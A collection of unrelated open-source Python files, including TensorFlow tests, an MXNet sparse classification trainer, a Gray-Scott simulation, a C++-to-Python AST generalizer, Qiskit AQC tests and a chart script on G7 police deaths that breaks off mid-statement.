test_x = tf.placeholder(tf.float32, [None, 128])
test_num_outputs = 40
output_out = output(test_x, test_num_outputs)
assert output_out.get_shape().as_list() == [None, 40],\
'Incorrect Shape. Found {} shape'.format(output_out.get_shape().as_list())
_print_success_message()
def test_conv_net(conv_net):
test_x = tf.placeholder(tf.float32, [None, 32, 32, 3])
test_k = tf.placeholder(tf.float32)
logits_out = conv_net(test_x, test_k)
assert logits_out.get_shape().as_list() == [None, 10],\
'Incorrect Model Output. Found {}'.format(logits_out.get_shape().as_list())
print('Neural Network Built!')
def test_train_nn(train_neural_network):
mock_session = tf.Session()
test_x = np.random.rand(128, 32, 32, 3)
test_y = np.random.rand(128, 10)
test_k = np.random.rand(1)
test_optimizer = tf.train.AdamOptimizer()
mock_session.run = MagicMock()
train_neural_network(mock_session, test_optimizer, test_k, test_x, test_y)
assert mock_session.run.called, 'Session not used'
_print_success_message()
|
example/sparse/linear_classification/train.py | Vikas-kum/incubator-mxnet | 228 | 12610183 | <gh_stars>100-1000
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import mxnet as mx
from mxnet.test_utils import *
from data import get_avazu_data
from linear_model import *
import argparse
import os
parser = argparse.ArgumentParser(description="Run sparse linear classification " \
"with distributed kvstore",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--num-epoch', type=int, default=5,
help='number of epochs to train')
parser.add_argument('--batch-size', type=int, default=8192,
help='number of examples per batch')
parser.add_argument('--kvstore', type=str, default=None,
help='what kvstore to use',
choices=["dist_sync", "dist_async", "local"])
parser.add_argument('--optimizer', type=str, default='sgd',
help='what optimizer to use',
choices=["adagrad", "sgd", "adam"])
AVAZU = {
'train': 'avazu-app',
'test': 'avazu-app.t',
'url': "https://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/binary/",
# 1000000 + 1 since LibSVMIter uses zero-based indexing
'num_features': 1000001,
}
def batch_row_ids(data_batch):
""" Generate row ids based on the current mini-batch """
return {'weight': data_batch.data[0].indices}
def all_row_ids(data_batch):
""" Generate row ids for all rows """
all_rows = mx.nd.arange(0, AVAZU['num_features'], dtype='int64')
return {'weight': all_rows}
if __name__ == '__main__':
import logging
head = '%(asctime)-15s %(message)s'
logging.basicConfig(level=logging.INFO, format=head)
# arg parser
args = parser.parse_args()
logging.info(args)
num_epoch = args.num_epoch
kvstore = args.kvstore
batch_size = args.batch_size
optimizer = args.optimizer
# create kvstore
kv = mx.kvstore.create(kvstore) if kvstore else None
rank = kv.rank if kv else 0
num_worker = kv.num_workers if kv else 1
# dataset
num_features = AVAZU['num_features']
data_dir = os.path.join(os.getcwd(), 'data')
train_data = os.path.join(data_dir, AVAZU['train'])
val_data = os.path.join(data_dir, AVAZU['test'])
get_avazu_data(data_dir, AVAZU['train'], AVAZU['url'])
get_avazu_data(data_dir, AVAZU['test'], AVAZU['url'])
# data iterator
train_data = mx.io.LibSVMIter(data_libsvm=train_data, data_shape=(num_features,),
batch_size=batch_size, num_parts=num_worker,
part_index=rank)
eval_data = mx.io.LibSVMIter(data_libsvm=val_data, data_shape=(num_features,),
batch_size=batch_size)
# model
    # The positive class weight says how much more we should upweight the importance
    # of positive instances in the objective function.
    # This is used to combat the extreme class imbalance.
positive_class_weight = 2
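    # Rough illustration only (the exact formulation is defined in linear_model()
    # and may differ): a weighted logistic loss of the form
    #   loss = -(w_pos * y * log(p) + (1 - y) * log(1 - p))
    # counts each positive example w_pos (= 2) times as heavily as a negative one.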
model = linear_model(num_features, positive_class_weight)
# module
mod = mx.mod.Module(symbol=model, data_names=['data'], label_names=['softmax_label'])
mod.bind(data_shapes=train_data.provide_data, label_shapes=train_data.provide_label)
mod.init_params()
optim = mx.optimizer.create(optimizer, learning_rate=0.01, rescale_grad=1.0/batch_size/num_worker)
mod.init_optimizer(optimizer=optim, kvstore=kv)
# use accuracy as the metric
metric = mx.metric.create(['nll_loss'])
# get the sparse weight parameter
speedometer = mx.callback.Speedometer(batch_size, 100)
logging.info('Training started ...')
for epoch in range(num_epoch):
nbatch = 0
metric.reset()
for batch in train_data:
nbatch += 1
# for distributed training, we need to manually pull sparse weights from kvstore
mod.prepare(batch, sparse_row_id_fn=batch_row_ids)
mod.forward_backward(batch)
# update all parameters (including the weight parameter)
mod.update()
# update training metric
mod.update_metric(metric, batch.label)
speedometer_param = mx.model.BatchEndParam(epoch=epoch, nbatch=nbatch,
eval_metric=metric, locals=locals())
speedometer(speedometer_param)
# prepare the module weight with all row ids for inference. Alternatively, one could call
        # score = mod.score(eval_data, ['nll_loss'], sparse_row_id_fn=batch_row_ids)
# to fetch the weight per mini-batch
mod.prepare(None, all_row_ids)
# evaluate metric on validation dataset
score = mod.score(eval_data, ['nll_loss'])
logging.info('epoch %d, eval nll = %s ' % (epoch, score[0][1]))
# prepare the module weight with all row ids before making a checkpoint.
mod.prepare(None, all_row_ids)
mod.save_checkpoint("checkpoint", epoch)
# reset the iterator for next pass of data
train_data.reset()
eval_data.reset()
logging.info('Training completed.')
|
samples/gray-scott/gs_jit.py | Ryoich/python_zero | 203 | 12610205 | <reponame>Ryoich/python_zero<gh_stars>100-1000
import matplotlib.pyplot as plt
from numba import jit
import numpy as np
# python gs_jit.py 1.91s user 0.16s system 119% cpu 1.736 total
@jit
def laplacian(ix, iy, s):
ts = 0.0
ts += s[ix-1, iy]
ts += s[ix+1, iy]
ts += s[ix, iy-1]
ts += s[ix, iy+1]
ts -= 4.0*s[ix, iy]
return ts
@jit
def calc(u, v, u2, v2):
(L, _) = u.shape
dt = 0.2
F = 0.04
k = 0.06075
lu = np.zeros((L, L))
lv = np.zeros((L, L))
for ix in range(1, L-1):
for iy in range(1, L-1):
lu[ix, iy] = 0.1 * laplacian(ix, iy, u)
lv[ix, iy] = 0.05 * laplacian(ix, iy, v)
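    # Reaction terms of the Gray-Scott model: the autocatalytic reaction
    # u + 2v -> 3v consumes u and produces v (the v*v*u terms); u is replenished
    # at feed rate F and v is removed at rate F + k.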
cu = -v*v*u + F*(1.0 - u)
cv = v*v*u - (F+k)*v
u2[:] = u + (lu+cu) * dt
v2[:] = v + (lv+cv) * dt
def main():
L = 64
u = np.zeros((L, L))
u2 = np.zeros((L, L))
v = np.zeros((L, L))
v2 = np.zeros((L, L))
h = L//2
u[h-6:h+6, h-6:h+6] = 0.9
v[h-3:h+3, h-3:h+3] = 0.7
for i in range(10000):
if i % 2 == 0:
calc(u, v, u2, v2)
else:
calc(u2, v2, u, v)
return v
plt.imshow(main())
plt.savefig("gs.png")
|
transpyle/cpp/ast_generalizer.py | EraYaN/transpyle | 107 | 12610212 | """Generalizing C++ AST."""
import logging
import pprint
# import re
import typing as t
import xml.etree.ElementTree as ET
import horast
from static_typing.ast_manipulation import RecursiveAstTransformer
import typed_ast.ast3 as typed_ast3
from ..general import XmlAstGeneralizer
from ..general.exc import ContinueIteration, AstGeneralizationError
from .definitions import CPP_PYTHON_TYPE_PAIRS, CPP_PYTHON_CLASS_PAIRS, CPP_STL_CLASSES
NAMESPACE_NODES = {'Namespace'}
TYPE_NODES = {'ArrayType', 'CvQualifiedType', 'ElaboratedType', 'FunctionType',
'FundamentalType', 'MethodType', 'OffsetType', 'PointerType', 'ReferenceType',
'Struct', 'Class', 'Typedef'}
RESOLVED_TYPE_NODES = ['FundamentalType', 'PointerType', 'ElaboratedType', 'Struct', 'Class']
IGNORED_NODES = {'File'} | NAMESPACE_NODES | TYPE_NODES
_LOG = logging.getLogger(__name__)
def make_pointer(base_type: typed_ast3.AST):
return typed_ast3.Subscript(
value=typed_ast3.Name(id='Pointer', ctx=typed_ast3.Load()),
slice=typed_ast3.Index(base_type), ctx=typed_ast3.Load())
def make_const(base_type: typed_ast3.AST):
return typed_ast3.Subscript(
value=typed_ast3.Name(id='Const', ctx=typed_ast3.Load()),
slice=typed_ast3.Index(base_type), ctx=typed_ast3.Load())
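# Both helpers return typed_ast3 ``Subscript`` nodes spelling ``Pointer[T]`` and
# ``Const[T]``; the CastXML type finder below emits them when resolving C++
# pointer and const-qualified types.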
class XmlAstGeneralizationError(AstGeneralizationError):
def __init__(self, generalizer: XmlAstGeneralizer, xml_node: ET.Element):
assert isinstance(generalizer, XmlAstGeneralizer), type(generalizer)
assert isinstance(xml_node, ET.Element), type(xml_node)
self.generalizer = generalizer
self.xml_node = xml_node
super().__init__(ET.tostring(xml_node).decode().rstrip())
def diagnose(function):
def wrapper(*args, **kwargs):
try:
return function(*args, **kwargs)
except AstGeneralizationError as error:
raise XmlAstGeneralizationError(*args, **kwargs) from error
except KeyError as error:
raise XmlAstGeneralizationError(*args, **kwargs) from error
return wrapper
class CastXMLTypeFinder(XmlAstGeneralizer):
"""Produce Python type hierarchy for C++ AST generated with CastXML."""
def __init__(self, scope=None):
super().__init__(scope)
assert scope is not None, \
'scope={\'path\': pathlib.Path(...)} has to be provided for C++ generalizer'
self.file_id = None
self._new_relevant_types = None
self.initialize()
def initialize(self):
self.file_id = None
self.namespaces = {}
self.all_types = {}
self.relevant_types = {}
self.resolved_types = {}
def _determine_file_id(self, root_node: ET.Element) -> str:
file_nodes = self.get_all(root_node, './File')
relevant_file_nodes = []
parsed_filename = str(self.scope['path'])
for file_node in file_nodes:
name = file_node.attrib['name']
if name != parsed_filename:
continue
relevant_file_nodes.append(file_node)
assert len(relevant_file_nodes) == 1, relevant_file_nodes
file_node = relevant_file_nodes[0]
return file_node.attrib['id']
def is_relevant(self, node: ET.Element):
try:
return node.attrib['file'] == self.file_id
except KeyError:
return False
def _CastXML(self, node: ET.Element): # pylint: disable=invalid-name
self.file_id = self._determine_file_id(node)
self.find_types(node)
while self._new_relevant_types:
_LOG.debug('there are %i new relevant types', len(self._new_relevant_types))
self.relevant_types.update(self._new_relevant_types)
self._new_relevant_types = {}
new_resolved_types = {}
for id_, node_ in self.relevant_types.items():
if id_ in self.resolved_types:
continue
new_resolved_types[id_] = self.transform_one(node_)
_LOG.debug('resolved %s into %s', ET.tostring(node_).decode().rstrip(),
horast.unparse(new_resolved_types[id_]))
self.resolved_types.update(new_resolved_types)
self._fix_resolved_types(self.resolved_types)
_LOG.info('type resolution complete: %s', pprint.pformat(
{_: horast.unparse(type_).strip() for _, type_ in self.resolved_types.items()}))
def find_types(self, root_node: ET.Element) -> t.Tuple[dict, dict]:
self._new_relevant_types = {}
self.transform_all_subnodes(root_node, ignored={'File'} | TYPE_NODES)
for type_ in TYPE_NODES:
for node in self.get_all(root_node, './{}'.format(type_), require_results=False):
id_ = node.attrib['id']
self.all_types[node.attrib['id']] = node
if id_ not in self._new_relevant_types:
continue
self._new_relevant_types[node.attrib['id']] = node
assert all(v is not None for v in self._new_relevant_types.values()), \
self._new_relevant_types
_LOG.info('found %i relevant types (out of %i) in "%s"',
len(self._new_relevant_types), len(self.all_types), self.scope['path'])
def _fix_resolved_types(self, resolved_types: dict) -> None:
resolver = CastXMLTypeResolver(resolved_types=resolved_types)
resolver.modified = True
while resolver.modified:
resolver.modified = False
for _, type_ in resolved_types.items():
resolver.visit(type_)
if resolver.unresolved_types:
_LOG.error('after type resolution for "%s", %i types remain unresolved',
self.scope['path'], len(resolver.unresolved_types))
_LOG.debug('the following types remain unresolved:\n%s',
pprint.pformat(resolver.unresolved_types))
raise NotImplementedError(
'could not resolve some types: {}'.format(resolver.unresolved_types))
def default(self, node: ET.Element):
"""Ignore irrelevant nodes, raise error otherwise."""
if not self.is_relevant(node):
# _LOG.warning('no file for %s', ET.tostring(node).decode().rstrip())
# self.no_transform(node)
raise ContinueIteration()
self.no_transform(node)
_Unimplemented = default
_Field = default
_Constructor = default
_Destructor = default
_Method = default
_OperatorMethod = default
_Variable = default
_Enumeration = default
_Union = default
_OperatorFunction = default
_Converter = default
def _Function(self, node: ET.Element): # pylint: disable=invalid-name
if not self.is_relevant(node):
raise ContinueIteration()
self.transform_all_subnodes(node)
self._new_relevant_types[node.attrib['returns']] = None
def _Argument(self, node: ET.Element): # pylint: disable=invalid-name
self._new_relevant_types[node.attrib['type']] = None
@diagnose
def _Namespace(self, node: ET.Element): # pylint: disable=invalid-name
id_ = node.attrib['id']
if 'name' not in node.attrib:
_LOG.info('ignoring namespace without name')
return
self.namespaces[id_] = node.attrib['name']
def _FundamentalType(self, node: ET.Element): # pylint: disable=invalid-name
name = node.attrib['name']
return typed_ast3.parse(CPP_PYTHON_TYPE_PAIRS[name], mode='eval').body
def _PointerType(self, node: ET.Element): # pylint: disable=invalid-name
type_id = node.attrib['type']
is_const = type_id.endswith('c')
if is_const:
type_id = type_id[:-1]
assert type_id in self.all_types
if type_id not in self.relevant_types and type_id not in self._new_relevant_types:
self._new_relevant_types[type_id] = self.all_types[type_id]
            _LOG.debug('type marked as relevant through a pointer: %s',
ET.tostring(self.all_types[type_id]).decode().rstrip())
type_info = make_pointer(typed_ast3.Str(type_id, ''))
if is_const:
type_info = make_const(type_info)
return type_info
'''
def _ElaboratedType(self, node: ET.Element): # pylint: disable=invalid-name
id_ = node.attrib['id']
type_ = node.attrib['type']
try:
base_type = self.fundamental_types[type_]
except KeyError:
# _LOG.debug()
base_type = typed_ast3.Str(type_, '')
type_info = typed_ast3.Subscript(
value=typed_ast3.Name(id='Elaborated', ctx=typed_ast3.Load()),
slice=typed_ast3.Index(base_type), ctx=typed_ast3.Load())
return (id_, type_info)
def _Struct(self, node: ET.Element): # pylint: disable=invalid-name
context = node.attrib['context']
if context not in self._namespaces or self._namespaces[context].id != 'std':
raise ContinueIteration()
struct_name = node.attrib['name']
full_name = '{}::{}'.format(context, struct_name)
if struct_name.startswith('hash<') and struct_name.endswith('>'):
raise ContinueIteration()
if full_name in CPP_PYTHON_CLASS_PAIRS:
id_ = node.attrib['id']
return (id_, typed_ast3.Name(id=CPP_PYTHON_CLASS_PAIRS[full_name], ctx=typed_ast3.Load()))
if struct_name.startswith('__'):
raise ContinueIteration()
self.no_transform(node)
'''
def _Class(self, node: ET.Element): # pylint: disable=invalid-name
context = node.attrib['context']
assert context in self.namespaces, context
cls_name = node.attrib['name']
if '<' in cls_name:
_LOG.warning('processing template class %s', cls_name)
assert '>' in cls_name
cls_name, _, rest = cls_name.partition('<')
rest = rest[:-1]
generic_args = [_.strip() for _ in rest.split(',')]
_LOG.warning('found generic args: %s', generic_args)
full_name = '{}::{}'.format(self.namespaces[context], cls_name)
is_stl_class = full_name in CPP_STL_CLASSES and generic_args
value_type = None
body = []
for member_id in node.attrib['members'].split():
if not is_stl_class:
# TODO: handle non-STL classes too
break
if member_id not in self.all_types:
continue
member_type = self.all_types[member_id]
if member_type.tag == 'Typedef' and member_type.attrib['name'] == 'value_type':
referenced_id = member_type.attrib['type']
assert referenced_id in self.all_types
if referenced_id not in self.relevant_types \
and referenced_id not in self._new_relevant_types:
self._new_relevant_types[referenced_id] = self.all_types[referenced_id]
_LOG.debug('type marked as relevant due to being container value type %s',
ET.tostring(self.all_types[referenced_id]).decode().rstrip())
body.append(typed_ast3.Expr(typed_ast3.Str(referenced_id, '')))
value_type = referenced_id
'''
if member_id not in self.relevant_types and member_id not in self._new_relevant_types:
self._new_relevant_types[member_id] = member_type
_LOG.warning('marked %s as relevant type',
ET.tostring(member_type).decode().rstrip())
body.append(typed_ast3.Expr(typed_ast3.Str(member_id, '')))
'''
base_class = typed_ast3.parse(CPP_PYTHON_CLASS_PAIRS[full_name], mode='eval').body
if is_stl_class:
assert value_type is not None
base_class = typed_ast3.Subscript(
value=base_class,
slice=typed_ast3.Index(typed_ast3.Str(value_type, '')), ctx=typed_ast3.Load())
return base_class
def _Base(self, node: ET.Element):
return node.attrib['type']
class CastXMLTypeResolver(RecursiveAstTransformer[typed_ast3]):
def __init__(self, *args, resolved_types, **kwargs):
super().__init__(*args, **kwargs)
self.resolved_types = resolved_types
self.unresolved_types = set()
self.modified = False
def visit_node(self, node):
if not isinstance(node, typed_ast3.Str):
return node
try:
resolved_type = self.resolved_types[node.s]
except KeyError:
self.unresolved_types.add(node.s)
_LOG.debug('cannot currently resolve %s', node.s)
return node
if node.s in self.unresolved_types:
self.unresolved_types.remove(node.s)
_LOG.debug('resolved %s into %s', node.s, typed_ast3.dump(resolved_type))
self.modified = True
return resolved_type
class CppAstGeneralizer(XmlAstGeneralizer):
"""Transform C++ XML AST generated with CastXML into Python AST from typed_ast."""
def __init__(self, scope=None):
super().__init__(scope)
assert scope is not None, \
'scope={"path": pathlib.Path(...)} has to be provided for C++ generalizer'
self.types = CastXMLTypeFinder(self.scope)
def _CastXML(self, node: ET.Element): # pylint: disable=invalid-name
self.types.initialize()
self.types.generalize(node)
body = self.transform_all_subnodes(node, ignored=IGNORED_NODES)
return typed_ast3.Module(body=body, type_ignores=[])
def default(self, node: ET.Element):
"""Ignore irrelevant nodes, raise error otherwise."""
if not self.types.is_relevant(node):
raise ContinueIteration()
self.no_transform(node)
_Field = default
_Constructor = default
_Destructor = default
_Method = default
_OperatorMethod = default
_Variable = default
_Enumeration = default
_Union = default
_OperatorFunction = default
_Converter = default
def _Unimplemented(self, node: ET.Element): # pylint: disable=invalid-name
try:
node_str = node.attrib['kind']
except KeyError:
_LOG.debug('unexpected behavior: %s', ET.tostring(node).decode().rstrip())
try:
node_str = node.attrib['type_class']
except KeyError:
self.no_transform(node)
_LOG.info('the underlying CastXML parser did not parse a %s', node_str)
raise ContinueIteration()
def _Function(self, node: ET.Element): # pylint: disable=invalid-name
if not self.types.is_relevant(node):
raise ContinueIteration()
name = node.attrib['name']
arguments = typed_ast3.arguments(args=self.transform_all_subnodes(node), vararg=None,
kwonlyargs=[], kwarg=None, defaults=[], kw_defaults=[])
body = [typed_ast3.Expr(value=typed_ast3.Ellipsis())]
returns = self.types.resolved_types[node.attrib['returns']]
return typed_ast3.FunctionDef(name=name, args=arguments, body=body, decorator_list=[],
returns=returns)
def _Argument(self, node: ET.Element): # pylint: disable=invalid-name
try:
annotation = self.types.resolved_types[node.attrib['type']]
except KeyError as error:
raise NotImplementedError('cannot generalize the node {}'.format(
ET.tostring(node).decode().rstrip())) from error
assert annotation is not None
return typed_ast3.arg(arg=node.attrib['name'], annotation=annotation)
def _Class(self, node: ET.Element): # pylint: disable=invalid-name
self.default(node)
'''
keywords = [typed_ast3.keyword(
arg='generic_args',
value=typed_ast3.Tuple([typed_ast3.Str(_, '') for _ in generic_args]))]
bases = self.transform_all_subnodes(node)
for base in bases:
assert base in self.all_types
if base not in self.relevant_types and base not in self._new_relevant_types:
self._new_relevant_types[base] = self.all_types[base]
_LOG.warning('marked %s as relevant type',
ET.tostring(self.all_types[base]).decode().rstrip())
if not body:
body = [typed_ast3.Pass()]
return typed_ast3.ClassDef(name=cls_name, bases=bases, keywords=keywords, body=body,
decorator_list=[])
'''
'''
if cls_name.startswith('vector<') and cls_name.endswith('>'):
_LOG.warning('processing class %s', ET.tostring(node).decode().rstrip())
# vector<double,
return (id_, typed_ast3.Subscript(
value=typed_ast3.Attribute(
value=typed_ast3.Name(id='t', ctx=typed_ast3.Load()),
attr='List', ctx=typed_ast3.Load()),
slice=typed_ast3.Index(typed_ast3.Attribute(
value=typed_ast3.Name(id='np', ctx=typed_ast3.Load()),
attr='double', ctx=typed_ast3.Load())), ctx=typed_ast3.Load()))
if re.fullmatch(r'[A-Za-z_]+', cls_name):
return (id_, typed_ast3.Name(id=cls_name, ctx=typed_ast3.Load()))
# import ipdb; ipdb.set_trace()
# return self.default(node)
#
raise ContinueIteration()
# _LOG.error('not really processing class %s', ET.tostring(node).decode().rstrip())
# return (id_, typed_ast3.Str('class_{}'.format(node.attrib['name']), ''))
'''
|
pysrc/gen_chip_list.py | CrackerCat/xed | 1,261 | 12610213 | <filename>pysrc/gen_chip_list.py
#!/usr/bin/env python
# -*- python -*-
#BEGIN_LEGAL
#
#Copyright (c) 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#END_LEGAL
from __future__ import print_function
import sys
import collections
import read_xed_db
import gen_setup
import chipmodel
def die(s):
sys.stdout.write("ERROR: {0}\n".format(s))
sys.exit(1)
def msgb(b,s=''):
sys.stdout.write("[{0}] {1}\n".format(b,s))
def check(chip, xeddb, chipdb, classes):
icount = 0
histo = collections.defaultdict(int)
for inst in xeddb.recs:
if inst.isa_set in chipdb[chip]:
icount = icount + 1
clas = classes[inst.isa_set]
if inst.scalar:
clas = clas + '.sc'
histo[clas] = histo[clas] + 1
return (chip, icount, histo)
def work(args): # main function
msgb("READING XED DB")
(chips, chip_db) = chipmodel.read_database(args.chip_filename)
xeddb = gen_setup.read_db(args)
isasets = set()
for r in xeddb.recs:
isasets.add(r.isa_set)
classes = {}
for i in isasets:
c = 'general'
if 'XOP' in i:
c = 'xop'
elif 'SSE' in i:
c = 'sse'
elif 'AVX512' in i:
c = 'avx512'
elif 'ICL' in i:
c = 'avx512'
elif 'AVX' in i:
c = 'avx'
elif 'FMA' in i:
c = 'avx'
elif 'F16C' in i:
c = 'avx'
elif 'MMX' in i:
c = 'mmx'
classes[i]=c
chip_icount_histo_tup = []
for c in chips:
r = check(c, xeddb, chip_db, classes)
chip_icount_histo_tup.append(r)
groups = [ 'general', 'mmx', 'sse', 'avx', 'avx512' ]
for inst in xeddb.recs:
if classes[inst.isa_set] == 'general' and inst.scalar:
print("GPR SCALAR", inst.iclass)
tlist = []
for s in chip_icount_histo_tup:
t = []
(chip, icount, histo) = s
t.append("{0:20s} {1:4d}".format(chip,icount))
for scalar in ['.sc', '']:
for x in groups:
k = x + scalar
t.append( "{0:7s}:{1:4d}".format( k, histo[k]))
tlist.append((icount, " ".join(t)))
def keyfn(x):
return x[0]
tlist.sort(key=keyfn)
for x,y in tlist:
print(y)
return 0
if __name__ == "__main__":
args = gen_setup.setup("Generate instruction counts per chip")
r = work(args)
sys.exit(r)
|
rpython/rtyper/lltypesystem/llheap.py | jptomo/pypy-lang-scheme | 381 | 12610226 | # only for the LLInterpreter. Don't use directly.
from rpython.rtyper.lltypesystem.lltype import malloc, free, typeOf
from rpython.rtyper.lltypesystem.llmemory import weakref_create, weakref_deref
setfield = setattr
from operator import setitem as setarrayitem
from rpython.rlib.rgc import can_move, collect, add_memory_pressure
def setinterior(toplevelcontainer, inneraddr, INNERTYPE, newvalue,
offsets=None):
assert typeOf(newvalue) == INNERTYPE
# xxx access the address object's ref() directly for performance
inneraddr.ref()[0] = newvalue
from rpython.rtyper.lltypesystem.lltype import cast_ptr_to_int as gc_id
def weakref_create_getlazy(objgetter):
return weakref_create(objgetter())
def shrink_array(p, smallersize):
return False
def thread_run():
pass
def thread_start():
pass
def thread_die():
pass
def pin(obj):
return False
def unpin(obj):
raise AssertionError("pin() always returns False, "
"so unpin() should not be called")
def _is_pinned(obj):
return False
|
scripts/13_random_name_generator.py | Kirklin12/python-scripts | 2,076 | 12610290 | <reponame>Kirklin12/python-scripts
from random import choice
def random_name_generator(first, second, x):
"""
Generates random names.
Arguments:
- list of first names
- list of last names
- number of random names
"""
names = []
for i in range(x):
names.append("{0} {1}".format(choice(first), choice(second)))
return set(names)
first_names = ["Drew", "Mike", "Landon", "Jeremy", "Tyler", "Tom", "Avery"]
last_names = ["Smith", "Jones", "Brighton", "Taylor"]
names = random_name_generator(first_names, last_names, 5)
print('\n'.join(names))
|
test/python/transpiler/aqc/test_aqc_plugin.py | Roshan-Thomas/qiskit-terra | 1,599 | 12610302 | <reponame>Roshan-Thomas/qiskit-terra<filename>test/python/transpiler/aqc/test_aqc_plugin.py
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
Tests AQC plugin.
"""
import numpy as np
from qiskit import QuantumCircuit
from qiskit.algorithms.optimizers import SLSQP
from qiskit.converters import dag_to_circuit, circuit_to_dag
from qiskit.quantum_info import Operator
from qiskit.test import QiskitTestCase
from qiskit.transpiler import PassManager
from qiskit.transpiler.passes import UnitarySynthesis
from qiskit.transpiler.synthesis.aqc.aqc_plugin import AQCSynthesisPlugin
class TestAQCSynthesisPlugin(QiskitTestCase):
"""Basic tests of the AQC synthesis plugin."""
def setUp(self):
super().setUp()
self._qc = QuantumCircuit(3)
self._qc.mcx(
[
0,
1,
],
2,
)
self._target_unitary = Operator(self._qc).data
self._seed_config = {"seed": 12345}
def test_aqc_plugin(self):
"""Basic test of the plugin."""
plugin = AQCSynthesisPlugin()
dag = plugin.run(self._target_unitary, config=self._seed_config)
approx_circuit = dag_to_circuit(dag)
approx_unitary = Operator(approx_circuit).data
np.testing.assert_array_almost_equal(self._target_unitary, approx_unitary, 3)
def test_plugin_setup(self):
"""Tests the plugin via unitary synthesis pass"""
transpiler_pass = UnitarySynthesis(
basis_gates=["rx", "ry", "rz", "cx"], method="aqc", plugin_config=self._seed_config
)
dag = circuit_to_dag(self._qc)
dag = transpiler_pass.run(dag)
approx_circuit = dag_to_circuit(dag)
approx_unitary = Operator(approx_circuit).data
np.testing.assert_array_almost_equal(self._target_unitary, approx_unitary, 3)
def test_plugin_configuration(self):
"""Tests plugin with a custom configuration."""
config = {
"network_layout": "sequ",
"connectivity_type": "full",
"depth": 0,
"seed": 12345,
"optimizer": SLSQP(),
}
transpiler_pass = UnitarySynthesis(
basis_gates=["rx", "ry", "rz", "cx"], method="aqc", plugin_config=config
)
dag = circuit_to_dag(self._qc)
dag = transpiler_pass.run(dag)
approx_circuit = dag_to_circuit(dag)
approx_unitary = Operator(approx_circuit).data
np.testing.assert_array_almost_equal(self._target_unitary, approx_unitary, 3)
def test_with_pass_manager(self):
"""Tests the plugin via pass manager"""
qc = QuantumCircuit(3)
qc.unitary(np.eye(8), [0, 1, 2])
aqc = PassManager(
[
UnitarySynthesis(
basis_gates=["u", "cx"], method="aqc", plugin_config=self._seed_config
)
]
).run(qc)
approx_unitary = Operator(aqc).data
np.testing.assert_array_almost_equal(np.eye(8), approx_unitary, 3)
|
mainapp/migrations/0024_auto_20180815_2306.py | sndp487/rescuekerala | 657 | 12610329 | <filename>mainapp/migrations/0024_auto_20180815_2306.py<gh_stars>100-1000
# Generated by Django 2.1 on 2018-08-15 17:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("mainapp", "0023_auto_20180815_1848"),
]
operations = [
migrations.AlterField(model_name="districtmanager", name="phone", field=models.CharField(max_length=11),),
]
|
dataviz/politics_g7_police.py | Udzu/pudzu | 119 | 12610334 | from pudzu.charts import *
FONT = calibri
SCALE = 2.25
s = lambda i: round(i * SCALE)
FONTSIZE = s(16)
BIGFONT = s(18)
SMALLFONT = s(14)
SUBTITLEFONT = s(36)
TITLEFONT = s(40)
atlas = pd.read_csv("datasets/countries.csv").split_columns('country', "|").explode('country').set_index("country")
df = pd.read_csv("datasets/g7_policedeaths.csv").set_index("country")
df["policedeaths_pm"] = df["policedeaths_total"] * 1000000 / atlas.loc[df.index].population
# Bar charts
def rlabel(r):
return Image.from_row([
Image.from_text(df.index[r].replace("\\n","\n"), FONT(FONTSIZE), "black", align="center"),
Image.from_url_with_cache(atlas.flag[df.index[r]]).convert("RGBA").resize((s(48*1.5),s(48))).trim(s(1)).pad(s(1), "grey")
], padding=(s(2),0))
def label_if(pred, labeler=lambda c,r,v: format_float(v, 3)): # TODO: automate this bit
return lambda c,r,v: None if not pred(v) else labeler(c,r,v)
df = df.sort_values("guns_ph", ascending=False)
guns = bar_chart(df[["guns_ph"]], s(48), s(400), bg=None, horizontal=True, spacing=s(2), label_font=FONT(FONTSIZE), rlabels=rlabel,
clabels= { BarChartLabelPosition.INSIDE : label_if(artial(op.ge,15)),
BarChartLabelPosition.OUTSIDE : label_if(artial(op.lt,15))},
grid_interval=10, grid_width=s(0.5), ymax=120, ylabel=Image.from_text("privately owned guns per 100 population (2017)", FONT(BIGFONT), padding=s(5)))
df = df.sort_values("homicide_pm", ascending=False)
homicides = bar_chart(df[["homicide_pm"]], s(48), s(400), bg=None, horizontal=True, spacing=s(2), label_font=FONT(FONTSIZE), rlabels=rlabel,
clabels= { BarChartLabelPosition.INSIDE : label_if(artial(op.ge,10), lambda c,r,v: "{:.1f} ({:,} total)".format(v, df.homicide_total[df.index[r]])),
BarChartLabelPosition.OUTSIDE : label_if(artial(op.lt,10), lambda c,r,v: "{:.1f} ({:,} total)".format(v, df.homicide_total[df.index[r]]) + (df.index[r] == "Japan")*" (lower than the US police’s killing rate!)")},
grid_interval=5, grid_width=s(0.5), ymax=50, ylabel=Image.from_text("intentional homicides per million population (2015)", FONT(BIGFONT), padding=s(5)))
df = df.sort_values("policedeaths_pm", ascending=False)
policedeaths = bar_chart(df[["policedeaths_pm"]], s(48), s(950), bg=None, horizontal=True, spacing=s(2), label_font=FONT(FONTSIZE), rlabels=rlabel,
